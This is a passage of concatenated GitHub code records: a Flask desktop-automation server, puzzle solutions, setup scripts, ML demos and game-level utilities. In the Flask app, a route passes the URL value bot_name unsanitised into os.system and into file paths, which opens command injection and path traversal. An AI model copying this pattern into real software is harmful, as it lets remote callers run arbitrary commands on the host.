img.show()\n\n","repo_name":"Brian1011/facial_recognition_test","sub_path":"facial.py","file_name":"facial.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43325333991","text":"# Library imports\n# import pyHook\n# from pyHook.HookManager import HookConstants\n# import pythoncom\nimport pyautogui\nimport time\nimport os\nimport json\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\n\n# Initialise flask app\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/record/')\ndef record(bot_name):\n # # Called when mouse events are received\n # def on_mouse_event(event):\n # # Check for all events except 'mouse move'\n # if event.MessageName != 'mouse move':\n # # Check button\n # if 'right' in event.MessageName:\n # button = 'right'\n # if 'left' in event.MessageName:\n # button = 'left'\n #\n # # Check direction\n # if 'down' in event.MessageName:\n # direction = 'down'\n # if 'up' in event.MessageName:\n # direction = 'up'\n #\n # # Append event to sequence\n # event_sequence.append({\n # 'type': 'mouse',\n # 'button': button,\n # 'direction': direction,\n # 'time': event.Time,\n # 'window': event.Window,\n # 'windowName': event.WindowName,\n # 'position': event.Position\n # })\n #\n # # return True to pass the event to other handlers\n # return True\n #\n # # Called when keyboard events are received\n # def on_keyboard_event(event):\n # # Clean up when escape is pressed\n # if event.Key == 'Escape':\n # # Load existing bot from given file\n # with open(bot_file_path) as bot_file:\n # bot = json.load(bot_file)\n #\n # # Merge newly created event_sequence with existing one\n # bot['events'] += event_sequence\n #\n # # Open bot_file in write mode\n # with open(bot_file_path, 'w') as bot_file:\n # # Replace current bot in bot_file with new bot\n # json.dump(bot, bot_file, indent=2)\n #\n # # Exit script\n # exit(0)\n #\n # # If ctrl pressed\n # if pyHook.GetKeyState(HookConstants.VKeyToID('VK_CONTROL')):\n # # If prev was ctrl as well\n # if event_sequence and event_sequence[-1]['type'] == 'keyboard' and \\\n # event_sequence[-1]['key'] == 'ctrlleft':\n # # If not this key is ctrl\n # if not (event.Key == 'Lcontrol' or event.Key == 'Rcontrol'):\n # # Append to prev entry's nextKeys list\n # event_sequence[-1]['nextKeys'].append(event.Key.lower())\n # else:\n # # Store this event with key as ctrl and nextKey as this key\n # event_sequence.append({\n # 'type': 'keyboard',\n # 'messageName': event.MessageName,\n # 'time': event.Time,\n # 'window': event.Window,\n # 'windowName': event.WindowName,\n # 'ascii': event.Ascii,\n # 'key': 'ctrlleft',\n # 'nextKeys': []\n # })\n # # Elif shift pressed\n # elif pyHook.GetKeyState(HookConstants.VKeyToID('VK_SHIFT')):\n # # If prev was shift as well\n # if event_sequence and event_sequence[-1]['type'] == 'keyboard' and \\\n # event_sequence[-1]['key'] == 'shiftleft':\n # # If not this key is shift\n # if not (event.Key == 'Lshift' or event.Key == 'Rshift'):\n # # Append to prev entry's nextKeys list\n # event_sequence[-1]['nextKeys'].append(event.Key.lower())\n # else:\n # # Store this event with key as shift and nextKey as this key\n # event_sequence.append({\n # 'type': 'keyboard',\n # 'messageName': event.MessageName,\n # 'time': event.Time,\n # 'window': event.Window,\n # 'windowName': event.WindowName,\n # 'ascii': event.Ascii,\n # 'key': 'shiftleft',\n # 'nextKeys': []\n # })\n # # For non ctrl/shift long-press situations\n # else:\n # # Handle special keys\n # event_sequence.append(handle_special_keys(event))\n #\n # # Return True to pass the event to other handlers\n # return True\n #\n # # Convert special key inputs from pyhook to pyautogui nomenclature\n # def handle_special_keys(event):\n # # If not a capital letter\n # if int(event.Ascii) < 65 or int(event.Ascii) > 90:\n # # Make all characters lowercase (handles mose cases)\n # key = event.Key.lower()\n # else:\n # key = event.Key\n #\n # # Define pyhook-pyautogui dict\n # conversion_dict = {\n # 'lshift': 'shiftleft',\n # 'rshift': 'shiftleft',\n # 'lcontrol': 'ctrlleft',\n # 'rcontrol': 'ctrlleft',\n # 'lmenu': 'altleft',\n # 'rmenu': 'altleft',\n # 'back': 'backspace',\n # 'prior': 'pageup',\n # 'next': 'pagedown',\n # 'volume_up': 'volumeup',\n # 'volume_down': 'volumedown',\n # 'volume_mute': 'volumemute',\n # 'capital': 'capslock',\n # 'lwin': 'winleft',\n # 'rwin': 'winleft'\n # }\n #\n # # Replace special keys with pyautogui equivalent\n # if key in conversion_dict:\n # key = conversion_dict[key]\n #\n # # Final event to return\n # final_event = {\n # 'type': 'keyboard',\n # 'messageName': event.MessageName,\n # 'time': event.Time,\n # 'window': event.Window,\n # 'windowName': event.WindowName,\n # 'ascii': event.Ascii,\n # 'key': key\n # }\n #\n # # If key is ctrl/shift, include nextKeys attribute\n # if key == 'shiftleft' or key == 'ctrlleft':\n # final_event['nextKeys'] = []\n #\n # return final_event\n #\n # # Get bot_file_path given bot_name\n # bot_file_path = os.path.join(os.getcwd(), bot_name + '.json')\n #\n # # Initialise global list of events\n # event_sequence = []\n #\n # # Create a hook manager\n # hm = pyHook.HookManager()\n #\n # # Watch for all mouse and keyboard events\n # hm.MouseAll = on_mouse_event\n # hm.KeyDown = on_keyboard_event\n #\n # # Set the hooks\n # hm.HookMouse()\n # hm.HookKeyboard()\n #\n # # Wait forever (using windows message loop)\n # pythoncom.PumpMessages()\n\n os.system('python recorder.py ' + bot_name)\n\n # Exit route\n return 'success'\n\n\n@app.route('/play/')\ndef play(bot_name):\n # Execute one mouse event\n def execute_mouse_event(event):\n # If down direction\n if event['direction'] == 'down':\n pyautogui.mouseDown(button=event['button'], x=event['position'][0], y=event['position'][1])\n\n # If up direction\n if event['direction'] == 'up':\n pyautogui.mouseUp(button=event['button'], x=event['position'][0], y=event['position'][1])\n # Pause python\n time.sleep(2)\n\n # Execute one mouse event\n def execute_keyboard_event(event):\n # If ctrl/shift\n if event['key'] == 'shiftleft' or event['key'] == 'ctrlleft':\n # Press special key\n pyautogui.keyDown(event['key'])\n\n # Loop through nextKeys\n for next_key in event['nextKeys']:\n pyautogui.press(next_key)\n\n # For any other key, just press\n pyautogui.press(event['key'])\n\n # Get bot_file_path from electron\n bot_file_path = os.path.join(os.getcwd(), bot_name + '.json')\n\n # Load bot (passed in as argument by electron)\n with open(bot_file_path) as bot_file:\n bot = json.load(bot_file)\n\n # Execute bot\n for event in bot['events']:\n # For mouse events\n if event['type'] == 'mouse':\n execute_mouse_event(event)\n\n # For keyboard events\n if event['type'] == 'keyboard':\n execute_keyboard_event(event)\n\n # Exit route\n return 'success'\n\n\n@app.route('/load-steps/')\ndef load_steps(bot_name):\n # Get bot_file_path from electron\n bot_file_path = os.path.join(os.getcwd(), bot_name + '.json')\n\n with open(bot_file_path) as bot_file:\n bot = json.load(bot_file)\n return jsonify(bot)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"shreyasparbat/autobot","sub_path":"src/pyAutomation/flask-app.py","file_name":"flask-app.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28525077725","text":"count1 = 0\ncount3 = 0\n\ndef count_diff(val1, val2):\n global count1\n global count3\n diff = val2 - val1\n \n if diff == 3:\n count3 += 1\n elif diff == 1:\n count1 += 1\n\ndata = sorted([int(x.strip()) for x in open(\"10/input.txt\")] + [0])\n\nfor i in range(len(data) - 1): \n count_diff(data[i], data[i + 1])\n\n# add final diff of 3 jolts to device\ncount3 += 1\n \nprint(count1 * count3)\n","repo_name":"bcwood/adventofcode2020","sub_path":"10/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15979716746","text":"from setuptools import find_packages, setup\nfrom typing import List\n\n########libraries / package installations#########\n# pip install -r requirements.txt\n\nHYPEN_E_DOT='-e .'\ndef get_requirements(file_path:str)->List[str]:\n '''\n this function returns the list of requirements\n '''\n requirements=[]\n with open(file_path) as file_obj:\n requirements=file_obj.readlines() #read the lines from file\n requirements=[req.replace(\"\\n\", \"\") for req in requirements]\n\n if HYPEN_E_DOT in requirements:\n requirements.remove(HYPEN_E_DOT)\n return requirements\n\nsetup(\n name ='mlproject',\n version = '0.0.1',\n author='bryan keane',\n author_email='bryankeane09@gmail.com',\n packages=find_packages(),\n install_requires=get_requirements('requirements.txt')\n)","repo_name":"bryank09/test-score-prediction","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28177731560","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 15 21:17:42 2017\n\n@author: Brilian\n\"\"\"\nimport numpy as np\n#plot softmax curves\nimport matplotlib.pyplot as plt\n\ndef softmax(x):\n expx = np.exp(x)\n return expx / expx.sum(axis=0) \n \nif __name__ == \"__main__\":\n scores = np.array([3.0, 1.0, 0.2]) \n print (softmax(scores))\n print (softmax(scores*10)) #the scores will be either near 1 or near 0\n print (softmax(scores/10)) #the scores will be in uniform distribution\n \n X = np.arange(-2.0, 6.0, 0.1)\n Xone = np.ones_like(X)\n scores = np.vstack([X, Xone, 0.2*Xone])\n \n plt.plot(X, softmax(scores).T, linewidth=2)\n plt.show()\n \n \n \n \n \n \n\n","repo_name":"briliantnugraha/Deep-learning-tensorflow-udacity","sub_path":"1.softmax.py","file_name":"1.softmax.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7810662961","text":"import numpy as np\nimport cv2\n\nclass ImageDecorator(object):\n\n def __init__(self):\n pass\n\n def fit(self):\n return\n\n def transform(self, _img, _lane_lines, _curvature):\n return np.copy(_img)\n\ndef trapezoid(img, src):\n src = np.int32(src)\n img = np.copy(img)\n src = src.reshape((-1,1,2))\n img = cv2.polylines(img, [src],True,(0,255,255), 5)\n return img\n\ndef weighted_img(img, initial_img, α=0.8, β=1., γ=0.):\n \"\"\"\n `img` is the output of the hough_lines(), An image with lines drawn on it.\n Should be a blank image (all black) with lines drawn on it.\n \n `initial_img` should be the image before any processing.\n \n The result image is computed as follows:\n \n initial_img * α + img * β + γ\n NOTE: initial_img and img must be the same shape!\n \"\"\"\n return cv2.addWeighted(initial_img, α, img, β, γ)\n\ndef image_in_image(original_image, img_array):\n\n output_image = np.copy(original_image)\n h, w = original_image.shape[0:2]\n margin = 50\n\n for pic_indx, pic in enumerate(img_array):\n resized = cv2.resize(pic, (int(w*0.3), int(h*0.3)), interpolation = cv2.INTER_AREA)\n r_h, r_w = resized.shape[0:2]\n \n # Scale up binary thresholded images\n if np.max(resized) == 1:\n resized = resized * 255\n\n # Add color channels to one channel images\n if len(resized.shape) == 2:\n resized = cv2.cvtColor(resized, cv2.COLOR_GRAY2RGB)\n\n output_image[0:r_h, pic_indx * (r_w + margin) : pic_indx * (r_w + margin) + r_w,:] = resized\n return output_image\n\ndef text_on_image(original_image, curvature=\"\", offset=\"\"):\n h, w = original_image.shape[0:2]\n\n text = \"Curvature: {0:4.1f} m Offset: {1:2.2f} m\".format(curvature, offset)\n \n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(original_image, text, (10, int(h*0.4)), font, 1, (255,255,255), 2, cv2.LINE_AA)\n return original_image\n\n","repo_name":"philippmarcus/CarND-Advanced-Lane-Lines","sub_path":"src/lanelines/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37216715381","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def plusOne(self, head: 'ListNode') -> 'ListNode':\n def helper(node):\n beforeAdd = node.val\n if node.next == None:\n node.val += 1\n else:\n node.val += helper(node.next)\n node.val %= 10\n return 1 if node.val == 0 and beforeAdd == 9 else 0 # this is the carry over digit\n\n if helper(head) == 1:\n newHead = ListNode(1)\n newHead.next = head\n return newHead\n else:\n return head\n\n\n","repo_name":"renjieliu/leetcode","sub_path":"0001_0599/369.py","file_name":"369.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"31874205741","text":"#!/usr/bin/python\n\n'''\nIssue #120\nAuthor: Ahmed\n\nUsage:\npython addspacerandrepeat.py\n\nReads in the contents of spacerdatabase.txt and DRdatabase.txt and imports their\ncontents to the Spacer and Repeat tables.\n\nA future iteration of this script could remove the hardcoded file paths and take in \ninput files as arguments.\n'''\n\n\nimport os\nimport sys\nfrom Bio import SeqIO\n\nspacerinput = '../data/spacerdatabase.txt'\nrepeatinput = '../data/DRdatabase.txt'\n\ndef populate_spacers():\n\tspacerfile = SeqIO.parse(spacerinput, 'fasta') \n\tfor entry in spacerfile: # that one file in data/\n\t\tspacer = entry.seq\n\t\tspacer, created = Spacer.objects.get_or_create(sequence = spacer)\n\t\t\ndef populate_repeats():\n\trepeatfile = SeqIO.parse(repeatinput, 'fasta')\n\tfor entry in repeatfile:\n\t\trepeat = entry.seq\n\t\trepeat, created = Repeat.objects.get_or_create(sequence = repeat)\n\nif __name__ == '__main__':\n\tprint(\"Initializing spacer table population.\")\n\timport os\n\timport django\n\tos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"phageAPI.settings\")\n\tdjango.setup()\n\tfrom restapi.models import Spacer, Repeat\n\tpopulate_spacers()\n\tprint(\"Spacer table population complete.\")\n\tprint(\"Initializing repeat table population.\")\n\tpopulate_repeats() \n\tprint(\"Repeat table population complete.\")\n\n","repo_name":"QuLogic/phageParser","sub_path":"phageAPI/addspacerandrepeat.py","file_name":"addspacerandrepeat.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"18167353860","text":"from flask import Flask, render_template, redirect, request, session\napp = Flask(__name__)\n\napp.secret_key = 'i have no enemies'\n\n@app.route('/')\ndef index():\n if 'key' in session:\n print('key exists')\n session['key'] += 1\n print(session['key'])\n else: \n session['key'] = 1\n print(session['key'])\n return render_template('index.html')\n\n@app.route('/add', methods=['POST'])\ndef loop():\n session['key'] += 1\n return redirect('/')\n\n@app.route('/destroy_session', methods = ['POST'])\ndef eat_cookies():\n session.clear()\n return redirect('/')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"LJR41/core_counter","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2915992675","text":"# problem 3\r\ndef neighbor_sum(a_list):\r\n n = len(a_list)\r\n # create a new list where the neighbors of each element are added to it\r\n b_list = [0 for i in range(n)]\r\n for i in range(0, n):\r\n # when there's number on the leftside\r\n if i - 1 >= 0: \r\n b_list[i] += a_list[i - 1]\r\n # when there's number on the rightside \r\n if i + 1 < n: \r\n b_list[i] += a_list[i + 1]\r\n # add itself all the time \r\n b_list[i] += a_list[i] \r\n return b_list\r\n\r\n\r\n# problem 4\r\ndef cal(e):\r\n # all the tax rate\r\n taxRate = [0.1, 0.12, 0.22, 0.24, 0.32, 0.35, 0.37]\r\n # all thresholds corresponded with the tax rate\r\n Single = [0.0, 9950.0, 40525.0, 86375.0, 164925.0, 209425.0, 5236600.0]\r\n n = len(e)\r\n total = [0 for i in range(n)]\r\n\r\n for j in range(n): \r\n # for adding paid tax in every range\r\n add_paid = 0.0 \r\n # in 2021, income $12550 is tax free\r\n if e[j] <= 12550:\r\n continue\r\n # start to calculate income part which need be taxed\r\n e[j] -= 12550\r\n # go through 7 tax rate ranges\r\n for i in range(7):\r\n # when supposed tax part is less or equal to 0, meaning no income part need to be taxed\r\n if e[j] <= 0:\r\n break\r\n if i != 6:\r\n # the most supposed tax pay from current tax range\r\n diff = Single[i + 1] - Single[i]\r\n # how much income is supposed to be calculated from current tax rate range\r\n be_taxed = min(diff, e[j])\r\n # in case it will come negative numbers for complete logic, although it seems unnecessary\r\n be_taxed = max(0, be_taxed)\r\n # calculate how much tax should be paid from current range\r\n add_paid += taxRate[i] * be_taxed\r\n # remove already taxed income part from total income\r\n e[j] -= be_taxed\r\n else:\r\n # when income over $523601\r\n be_taxed = e[j]\r\n be_taxed = max(0, be_taxed)\r\n add_paid += taxRate[i] * be_taxed\r\n total[j] = add_paid\r\n return total\r\n\r\n\r\ndef get_income_tax(e):\r\n return cal(e)\r\n\r\n\r\n# problem 5\r\nclass SetSuite:\r\n \r\n def __init__(self, list_of_lists):\r\n self._list = []\r\n for a_list in list_of_lists:\r\n self.add_set(a_list)\r\n\r\n # adds a new set to the internal list of sets\r\n def add_set(self, new_List):\r\n self._list.append(list(set(new_List)))\r\n\r\n # returns the internal list of sets\r\n def get_sets(self):\r\n return self._list\r\n\r\n # returns the union set of all sets\r\n def union_all(self):\r\n u_set = set()\r\n for a_set in self._list:\r\n u_set = u_set.union(set(a_set))\r\n return list(u_set)\r\n\r\n # returns the intersection set of all sets\r\n def intersection_all(self):\r\n if len(self._list) == 0:\r\n return list(set())\r\n\r\n i_set = set(self._list[0])\r\n for a_set in self._list[1:]:\r\n i_set = i_set.intersection(a_set)\r\n return list(i_set)\r\n\r\n\r\n\r\n\r\n# problem 6\r\ndef pascal(row):\r\n # pattern as below\r\n # 1\r\n # 1 1\r\n # 1 2 1\r\n # 1 3 3 1\r\n # every number is the sum of upper one and left upper number, no existence is 0\r\n tri = [[0 for i in range(row + 10)] for i in range(row + 10)]\r\n tri[0][0] = 1\r\n for i in range(1, row + 1):\r\n tri[i][0] = 1\r\n for j in range(1, row + 1):\r\n tri[i][j] = tri[i - 1][j - 1] + tri[i - 1][j]\r\n return tri[row][:row + 1]\r\n\r\n\r\n# problem 7\r\ndef perfect_power(num_1, num_2):\r\n power_num = num_1\r\n # corner case\r\n if num_1 == num_2:\r\n return True\r\n # keep multiple num_1 until they are equal\r\n while num_1 < num_2:\r\n num_1 *= power_num\r\n if num_1 == num_2:\r\n return True\r\n return False\r\n\r\n\r\n# extra credit\r\n\r\ndef change(num, l, r, base, cur):\r\n # left and right are the range of num, cur is some power of base\r\n if l > r:\r\n return 0\r\n # turn the last digit of num into integer\r\n e = int(num[r])\r\n # value of current position multiple cur, then add value from left to (right-1) of num\r\n return cur * e + change(num, l, r - 1, base, cur * base)\r\n\r\n\r\ndef convert_to_10(num, base):\r\n l = 0\r\n r = len(num) - 1\r\n for i in range(r + 1):\r\n if int(num[i]) >= base:\r\n return \"Invalid Number\"\r\n return change(num, l, r, base, 1)\r\n","repo_name":"qiyuanhuadelaide/Python_Code","sub_path":"hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70433215413","text":"from termcolor import colored\nfrom pyfiglet import figlet_format\nfrom random import choice\nimport requests\n\n\ndef print_ascii_message(msg):\n color = 'magenta'\n ascii_art = figlet_format(msg)\n colored_ascii = colored(ascii_art, color=color)\n print(colored_ascii)\n\n\ndef get_jokes(jokes):\n url = 'https://icanhazdadjoke.com/search'\n response = requests.get(url, headers={'Accept': 'application/json'},\n params={'term': jokes})\n data = response.json()\n return data['results']\n\n\ndef show_jokes(jokes, keyword):\n if len(jokes) > 1:\n print(f'I\\'ve got {len(jokes)} jokes about {keyword}. Here\\'s one: ')\n show = choice(jokes)\n print(show['joke'])\n elif kidding == 1:\n print(f'I\\'ve got 1 jokes about {keyword}. Here it is: ')\n print(jokes['joke'])\n else:\n print(f'Sorry, i don\\'t have any jokes about {keyword}')\n\n\nprint_ascii_message('Dad Joke 3000')\njokes = input('Let me tell you a joke! Give me a topic: ')\nkidding = get_jokes(jokes)\nshow_jokes(kidding, jokes)\n","repo_name":"yanoandri/python-scripts","sub_path":"scripts/dad_jokes/dad.py","file_name":"dad.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27603513403","text":"'''\nWrite a script that demonstrates a try/except/else.\n\n'''\n\nlist1 = [1,2,3,4,5,6,7,8,9]\nlist2 = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\", \"i\", \"j\"]\nlists = [list1, list2]\n\ndef trying_if_out(a_list):\n\n try:\n a = a_list[9]\n\n except IndexError:\n print(a_list[0])\n\n else:\n print(a)\n\n\n\nfor l in lists:\n trying_if_out(l)\n\n","repo_name":"LuckyLub/python-onsite","sub_path":"week_03/02_exception_handling/03_else.py","file_name":"03_else.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15176732914","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nGiven a string, remove characters until the string is made up of any two alternating characters. \nWhen you choose a character to remove, all instances of that character must be removed. Determine \nthe longest string possible that contains just two alternating letters.\n\n\nFunction Description:\nComplete the alternate function below.\nalternate has the following parameters:\n\nINPUT:\n string s: a string\nOUTPUT:\n int: the length of the longest valid string, or if there are none\n \nLink to problem statement: \nhttps://www.hackerrank.com/challenges/two-characters/problem\n\"\"\"\n\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom collections import Counter\nfrom itertools import combinations\n\n\"\"\"\nComplete the 'alternate' function below.\nThe function is expected to return an INTEGER.\nThe function accepts STRING s as parameter.\n\nLink to problem statement:\nhttps://www.hackerrank.com/challenges/two-characters/problem\n\"\"\"\n\ndef alternate(s):\n \n # some edge cases\n if len(s)<2 or s[0]==s[1]:\n return 0\n elif len(s) == 2 and s[0]!=s[1]:\n return 2\n \n # create the combinations of letters to be removed from s\n letters = list(Counter(s).keys())\n letters_combinations_remove = combinations(letters,len(letters)-2)\n \n # resulting strings after removing the combination of letters from s\n two_characters_strings = []\n for combination in letters_combinations_remove:\n #print(combination)\n s_short = s\n for ch in combination:\n s_short = s_short.replace(ch,\"\")\n two_characters_strings.append(s_short)\n \n # create the list of strings with alternate characters only\n two_characters_strings_special = two_characters_strings.copy()\n for item in two_characters_strings: \n \n if item[0] == item[1]:\n two_characters_strings_special.remove(item)\n continue \n \n for index in range(len(item)-2):\n if item[index] != item[index+2]:\n two_characters_strings_special.remove(item)\n break\n if two_characters_strings_special:\n return len(max(two_characters_strings_special, key=len))\n else:\n return 0\n\n#if __name__ == '__main__':\n# fptr = open(os.environ['OUTPUT_PATH'], 'w')\n# l = int(input().strip())\n# s = input()\n# result = alternate(s)\n# fptr.write(str(result) + '\\n')\n# fptr.close()\n","repo_name":"akerimov/HACKER_RANK","sub_path":"TwoCharacters.py","file_name":"TwoCharacters.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23303704513","text":"import math\nimport os\nimport pickle\n\nimport pygame\n\nfrom data.scripts.level_generator.config import SMALL_SQUARE_SHAPE, VERTICAL_SHAPE, HORIZONTAL_SHAPE, BIG_SQUARE_SHAPE\nfrom level_creator.data.scripts.config import GRID_SIZE, NOTHING, BLOCK, NEXT_LINE, LEVEL_PATH, SMALL_LEFT_INDEX, \\\n SMALL_RIGHT_INDEX, SMALL_BOTTOM_INDEX, SMALL_TOP_INDEX, VERTICAL_TOP_INDEX, VERTICAL_BOTTOM_INDEX, \\\n VERTICAL_TOPLEFT_INDEX, VERTICAL_TOPRIGHT_INDEX, VERTICAL_BOTTOMRIGHT_INDEX, VERTICAL_BOTTOMLEFT_INDEX, \\\n HORIZONTAL_LEFT_INDEX, HORIZONTAL_RIGHT_INDEX, HORIZONTAL_TOPLEFT_INDEX, HORIZONTAL_TOPRIGHT_INDEX, \\\n HORIZONTAL_BOTTOMLEFT_INDEX, HORIZONTAL_BOTTOMRIGHT_INDEX, BIG_TOPLEFT_TOP_INDEX, BIG_TOPLEFT_LEFT_INDEX, \\\n BIG_TOPRIGHT_TOP_INDEX, BIG_TOPRIGHT_RIGHT_INDEX, BIG_BOTTOMLEFT_BOTTOM_INDEX, BIG_BOTTOMLEFT_LEFT_INDEX, \\\n BIG_BOTTOMRIGHT_BOTTOM_INDEX, BIG_BOTTOMRIGHT_RIGHT_INDEX\n\n\ndef read_f(path):\n f = open(path, 'r')\n dat = f.read()\n f.close()\n return dat\n\n\ndef write_f(path, dat):\n f = open(path, 'w')\n f.write(dat)\n f.close()\n\n\ndef load_image_dir(path, colorkey=(0, 0, 0)):\n images = {}\n for img_name in os.listdir(path):\n img = pygame.image.load(path + '/' + img_name).convert()\n img.set_colorkey(colorkey)\n images[img_name.split('.')[0]] = img.copy()\n return images\n\n\ndef warp_surf(surface, mask, loc, shift):\n offset = [mask.get_width() // 2, mask.get_height() // 2]\n loc = [loc[0] - offset[0], loc[1] - offset[1]]\n subsurf = clip(surface, loc[0], loc[1], mask.get_width(), mask.get_height())\n mask.set_colorkey((255, 255, 255))\n subsurf.blit(mask, (0, 0))\n subsurf.set_colorkey((0, 0, 0))\n surface.blit(subsurf, (loc[0] + shift[0], loc[1] + shift[1]))\n\n\ndef swap_color(img, old_c, new_c):\n global e_colorkey\n img.set_colorkey(old_c)\n surf = img.copy()\n surf.fill(new_c)\n surf.blit(img, (0, 0))\n return surf\n\n\ndef clip(surf, x, y, x_size, y_size):\n handle_surf = surf.copy()\n clipR = pygame.Rect(x, y, x_size, y_size)\n handle_surf.set_clip(clipR)\n image = surf.subsurface(handle_surf.get_clip())\n return image.copy()\n\n\ndef rect_corners(points):\n point_1 = points[0]\n point_2 = points[1]\n out_1 = [min(point_1[0], point_2[0]), min(point_1[1], point_2[1])]\n out_2 = [max(point_1[0], point_2[0]), max(point_1[1], point_2[1])]\n return [out_1, out_2]\n\n\ndef corner_rect(points):\n points = rect_corners(points)\n r = pygame.Rect(points[0][0], points[0][1], points[1][0] - points[0][0], points[1][1] - points[0][1])\n return r\n\n\ndef points_between_2d(points):\n points = rect_corners(points)\n width = points[1][0] - points[0][0] + 1\n height = points[1][1] - points[0][1] + 1\n point_list = []\n for y in range(height):\n for x in range(width):\n point_list.append([points[0][0] + x, points[0][1] + y])\n return point_list\n\n\ndef angle_to(points):\n return math.atan2(points[1][1] - points[0][1], points[1][0] - points[0][0])\n\n\ndef horizontal_crop(loc_x, width, img):\n loc_x = int(loc_x)\n loc_x = loc_x % img.get_width()\n if loc_x + width <= img.get_width():\n return img.copy()\n else:\n left_sec = img.get_width() - loc_x\n right_sec = width - left_sec\n output_surf = pygame.Surface((width, img.get_height()))\n output_surf.blit(clip(img, loc_x, 0, left_sec, img.get_height()), (0, 0))\n output_surf.blit(clip(img, 0, 0, right_sec, img.get_height()), (left_sec, 0))\n colorkey = img.get_colorkey()\n output_surf.set_colorkey(colorkey)\n return output_surf\n\n\ndef bordering_tile_x(x):\n base_x = int(x / GRID_SIZE)\n return [base_x - 1, base_x, base_x + 1]\n\n\ndef blit_center(surf, surf2, pos):\n x = int(surf2.get_width() / 2)\n y = int(surf2.get_height() / 2)\n surf.blit(surf2, (pos[0] - x, pos[1] - y))\n\n\ndef get_center_pos(surf):\n return [int(surf.get_width() / 2), int(surf.get_height() / 2)]\n\n\ndef normalize(num, amt):\n if num > amt:\n num -= amt\n elif num < -amt:\n num += amt\n else:\n num = 0\n return num\n\n\ndef mouse_over(rect):\n if type(rect) == pygame.Rect:\n return rect.collidepoint(pygame.mouse.get_pos())\n else:\n return rect.get_rect().collidepoint(pygame.mouse.get_pos())\n\n\ndef level_to_string(level):\n level_list = []\n for i in range(level.level_window[1] // GRID_SIZE):\n y = i * GRID_SIZE + 1\n for j in range(level.level_window[0] // GRID_SIZE):\n x = j * GRID_SIZE + 1\n collided = False\n for block in level.level_list:\n if block.get_rect().collidepoint((x, y)) and not collided:\n collided = True\n level_list.append(block.type['letter'])\n if not collided:\n level_list.append(NOTHING)\n level_list.append(NEXT_LINE)\n level_string = ''.join(level_list)\n return {'string': level_string, 'shape': level.shape}\n\n\ndef level_to_pickle(level, name):\n level['doors'] = get_doors(level)\n print(level['doors'])\n with open(LEVEL_PATH + name + '.pickle', 'wb') as file:\n pickle.dump(level, file)\n\n\ndef save_level(level, name):\n level_to_pickle(level_to_string(level), name)\n print(\"Level \" + name + \" saved.\\n\")\n\n\ndef get_doors(level):\n doors = {}\n if level['shape'] == SMALL_SQUARE_SHAPE:\n doors = {'top': False, 'bottom': False, 'left': False, 'right': False}\n if level['string'][SMALL_LEFT_INDEX] == NOTHING:\n doors['left'] = True\n if level['string'][SMALL_RIGHT_INDEX] == NOTHING:\n doors['right'] = True\n if level['string'][SMALL_BOTTOM_INDEX] == NOTHING:\n doors['bottom'] = True\n if level['string'][SMALL_TOP_INDEX] == NOTHING:\n doors['top'] = True\n elif level['shape'] == VERTICAL_SHAPE:\n doors = {'top': False, 'bottom': False, 'topleft': False, 'topright': False, 'bottomleft': False,\n 'bottomright': False}\n if level['string'][VERTICAL_TOP_INDEX] == NOTHING:\n doors['top'] = True\n if level['string'][VERTICAL_BOTTOM_INDEX] == NOTHING:\n doors['bottom'] = True\n if level['string'][VERTICAL_TOPLEFT_INDEX] == NOTHING:\n doors['topleft'] = True\n if level['string'][VERTICAL_TOPRIGHT_INDEX] == NOTHING:\n doors['topright'] = True\n if level['string'][VERTICAL_BOTTOMLEFT_INDEX] == NOTHING:\n doors['bottomleft'] = True\n if level['string'][VERTICAL_BOTTOMRIGHT_INDEX] == NOTHING:\n doors['bottomright'] = True\n elif level['shape'] == HORIZONTAL_SHAPE:\n doors = {'left': False, 'right': False, 'topleft': False, 'topright': False, 'bottomleft': False,\n 'bottomright': False}\n if 